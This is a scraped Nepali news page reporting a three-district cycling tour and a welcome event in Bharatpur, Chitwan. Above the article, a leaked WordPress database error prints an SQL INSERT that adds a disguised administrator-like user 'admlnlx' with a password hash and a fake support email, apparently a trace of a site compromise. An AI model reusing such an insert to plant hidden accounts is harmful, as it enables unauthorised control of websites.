WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BH5Cy1lkBoVHtBOYk5W3Dg60mCE2MP/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-22 09:12:20', '', 'admlnlx', 'admlnlx')
चितवन, पुस २–
धार्मिक, ऐतिहासिक एवम् पर्यटकीय क्षेत्रको प्रचारप्रसार तथा प्रवद्र्धनको लागि साइकल यात्रा कार्यक्रम शुक्रबारदेखि शुरु भएको छ । सो यात्रालाइ प्रोत्साहन गर्नका लागि लक्की मिडिया हाउस चितवनको आयोजनामा शुक्रबार भरतपुरमा स्वागत तथा सम्मान कार्यक्रम गरिएको छ ।
कार्यक्रममा ५० जना साइकल यात्रीहरुलाई स्वागत तथा सम्मान गरिएको लक्की मिडिया हाउस चितवनका अध्यक्ष हरि कार्की “लक्की“ ले जानकारी दिनुभयो । विश्व साइकल यात्री पुस्कर शाहको सहभागीतामा साइकल चलाऔँ, वातावरण जोगाऔँ, स्वास्थ्य बनौँ भन्ने नाराका साथ शुरु गरिएको सो यात्रा मकवानपुरदेखि सुरु भई आज शुक्रबार चितवन र भोली शनिबार नवलपरासी पुग्ने कार्यक्रम रहेको कार्यक्रम सयोजक राहुल कुमार सिहले बताउनुभयो । यस यात्राको उद्देश्य मकवानपुर, चितवन र नवलपरासीका युवा तथा उद्योग व्यवसायीहरुबीच भाइचरा सम्बन्ध कायम राख्न कार्यक्रम सिहले बताउनुभयो ।
तीन वटा जिल्लाको यात्राले त्यस क्षेत्रका उद्योगी, व्यापारीहरु बीच भाइचाराको सम्बन्ध स्थापना हुने विश्वास लिएको जनाइएको छ । साइकल यात्रा कार्यक्रम पुस ३ गतेसम्म हुने छ ।